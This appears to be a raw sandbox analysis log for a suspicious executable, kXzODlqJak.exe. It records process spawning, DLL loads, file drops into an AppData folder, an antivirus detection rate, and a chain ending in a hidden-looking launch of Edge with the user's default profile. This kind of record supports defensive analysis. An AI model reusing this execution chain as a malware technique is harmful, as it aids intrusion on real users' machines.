Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_009498F9 ChangeServiceConfigW,GetLastError,1_2_009498F9
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_testJump to behavior
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8:120:WilError_03
Source: C:\Users\user\Desktop\kXzODlqJak.exeFile created: C:\Users\user~1\AppData\Local\Temp\Rubrician_20250109084129.cleanroom.logJump to behavior
Source: kXzODlqJak.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSystem information queried: HandleInformation
Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: kXzODlqJak.exeReversingLabs: Detection: 44%
Source: kXzODlqJak.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: kXzODlqJak.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: C:\Users\user\Desktop\kXzODlqJak.exeFile read: C:\Users\user\Desktop\kXzODlqJak.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\kXzODlqJak.exe "C:\Users\user\Desktop\kXzODlqJak.exe"
Source: C:\Users\user\Desktop\kXzODlqJak.exeProcess created: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe "C:\Windows\TEMP\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe" -burn.clean.room="C:\Users\user\Desktop\kXzODlqJak.exe" -burn.filehandle.attached=648 -burn.filehandle.self=652
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeProcess created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe C:\Windows\TEMP\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeProcess created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe "C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe"
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2180,i,768463352532878709,16600556330849448278,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2904 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7096 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5304 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7120 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:8
Source: C:\Users\user\Desktop\kXzODlqJak.exeProcess created: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe "C:\Windows\TEMP\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe" -burn.clean.room="C:\Users\user\Desktop\kXzODlqJak.exe" -burn.filehandle.attached=648 -burn.filehandle.self=652Jump to behavior
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeProcess created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe C:\Windows\TEMP\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeProcess created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2180,i,768463352532878709,16600556330849448278,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2904 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7096 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5304 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7120 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:8
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: msi.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: feclient.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeSection loaded: feclient.dllJump to behavior
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: starburn.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: qtcore4.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: qtgui4.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: qtnetwork4.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: qtxml4.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: pla.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: tdh.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: starburn.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: qtcore4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: qtgui4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: qtnetwork4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: qtxml4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: pla.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: pdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: tdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: starburn.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: qtcore4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: qtgui4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: qtnetwork4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: qtxml4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: pla.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: pdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: tdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
